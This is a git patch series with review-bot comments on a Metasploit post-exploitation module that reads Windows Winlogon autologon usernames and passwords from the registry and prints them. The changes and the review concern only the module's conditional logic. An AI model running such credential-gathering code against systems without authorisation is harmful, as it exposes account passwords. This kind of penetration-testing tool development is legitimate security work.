From 0d3f5ae22085ec23f3ec4a45b3349ab444f2a050 Mon Sep 17 00:00:00 2001
From: Christian Mehlmauer
Date: Tue, 18 Jul 2017 22:50:34 +0200
Subject: [PATCH 1/2] cleanup windows_autologin
---
 .../gather/credentials/windows_autologin.rb | 22 +++++--------------
 1 file changed, 6 insertions(+), 16 deletions(-)
diff --git a/modules/post/windows/gather/credentials/windows_autologin.rb b/modules/post/windows/gather/credentials/windows_autologin.rb
index 0cf6f1170f..2ef17660bf 100644
--- a/modules/post/windows/gather/credentials/windows_autologin.rb
+++ b/modules/post/windows/gather/credentials/windows_autologin.rb
@@ -45,8 +45,6 @@ class MetasploitModule < Msf::Post
 has_al = 0
- # DefaultDomainName, DefaultUserName, DefaultPassword
- # AltDefaultDomainName, AltDefaultUserName, AltDefaultPassword
 logon_key = "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\"
 al = registry_getvaldata(logon_key, "AutoAdminLogon") || ''
@@ -58,24 +56,16 @@ class MetasploitModule < Msf::Post
 du2 = registry_getvaldata(logon_key, "AltDefaultUserName") || ''
 dp2 = registry_getvaldata(logon_key, "AltDefaultPassword") || ''
- if do1 != '' and du1 != '' and dp1 == '' and al == '1'
+ if do1 != '' && du1 != '' && dp1 == ''
 has_al = 1
- creds << [du1,dp1, do1]
- print_good("DefaultDomain=#{do1}, DefaultUser=#{du1}, DefaultPassword=#{dp1}")
- elsif do1 != '' and du1 != '' and dp1 != ''
- has_al = 1
- creds << [du1,dp1, do1]
- print_good("DefaultDomain=#{do1}, DefaultUser=#{du1}, DefaultPassword=#{dp1}")
+ creds << [du1, dp1, do1]
+ print_good("AutoAdminLogon=#{al}, DefaultDomain=#{do1}, DefaultUser=#{du1}, DefaultPassword=#{dp1}")
 end
- if do2 != '' and du2 != '' and dp2 == '' and al == '1'
+ if do2 != '' && du2 != '' && dp2 == ''
 has_al = 1
- creds << [du2,dp2,do2]
- print_good("AltDomain=#{do2}, AltUser=#{du2}, AltPassword=#{dp2}")
- elsif do2 != '' and du2 != '' and dp2 != ''
- has_al = 1
- creds << [du2,dp2,do2]
- print_good("AltDomain=#{do2}, AltUser=#{du2}, AltPassword=#{dp2}")
+ creds << [du2, dp2, do2]
+ print_good("AutoAdminLogon=#{al}, AltDomain=#{do2}, AltUser=#{du2}, AltPassword=#{dp2}")
 end
 if has_al == 0
From b4bb384577329eaf363a19d54510d9a61d2e296e Mon Sep 17 00:00:00 2001
From: Christian Mehlmauer
Date: Sat, 22 Jul 2017 18:54:36 +0200
Subject: [PATCH 2/2] add @pbarry-r7 's feedback
---
 modules/post/windows/gather/credentials/windows_autologin.rb | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/modules/post/windows/gather/credentials/windows_autologin.rb b/modules/post/windows/gather/credentials/windows_autologin.rb
index 2ef17660bf..6384e5786a 100644
--- a/modules/post/windows/gather/credentials/windows_autologin.rb
+++ b/modules/post/windows/gather/credentials/windows_autologin.rb
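Review bot: The new conditions `if do1 != '' && du1 != '' && dp1 == ''` and `if do2 != '' && du2 != '' && dp2 == ''` are not equivalent to the `if`/`elsif` pairs they replace. An entry whose password value is non-empty no longer matches, and an empty one matches whatever `AutoAdminLogon` holds, since `al` is now only printed. A commit titled as a cleanup should keep the old truth table; patch 2/2 on this page puts the `al == '1'` test and the non-empty case back, so squashing the two would avoid leaving a revision with the altered behaviour in history. The enclosing method starts and ends outside the hunk.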
@@ -56,13 +56,13 @@ class MetasploitModule < Msf::Post
 du2 = registry_getvaldata(logon_key, "AltDefaultUserName") || ''
 dp2 = registry_getvaldata(logon_key, "AltDefaultPassword") || ''
- if do1 != '' && du1 != '' && dp1 == ''
+ if do1 != '' && du1 != '' && (dp1 != '' || (dp1 == '' && al == '1'))
 has_al = 1
 creds << [du1, dp1, do1]
 print_good("AutoAdminLogon=#{al}, DefaultDomain=#{do1}, DefaultUser=#{du1}, DefaultPassword=#{dp1}")
 end
- if do2 != '' && du2 != '' && dp2 == ''
+ if do2 != '' && du2 != '' && (dp2 != '' || (dp2 == '' && al == '1'))
 has_al = 1
 creds << [du2, dp2, do2]
 print_good("AutoAdminLogon=#{al}, AltDomain=#{do2}, AltUser=#{du2}, AltPassword=#{dp2}")
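Review bot: The inner `dp1 == ''` test is redundant, because that side of the `||` is only evaluated when `dp1 != ''` is already false; the condition reads more clearly as `if do1 != '' && du1 != '' && (dp1 != '' || al == '1')`, and likewise for the `do2`/`du2`/`dp2` block. Since `registry_getvaldata(...) || ''` (visible here for `du2`/`dp2`, presumably the same for the other values) folds a missing value into `''`, the `al == '1'` branch adds a row whose empty password can mean the value is absent from this key as well as set to an empty string. A short comment above each `creds <<`, for example `# empty password: value missing or empty under Winlogon, not proof of a blank account password`, would keep readers of the results table from misreading that row. The enclosing method starts and ends outside the hunk.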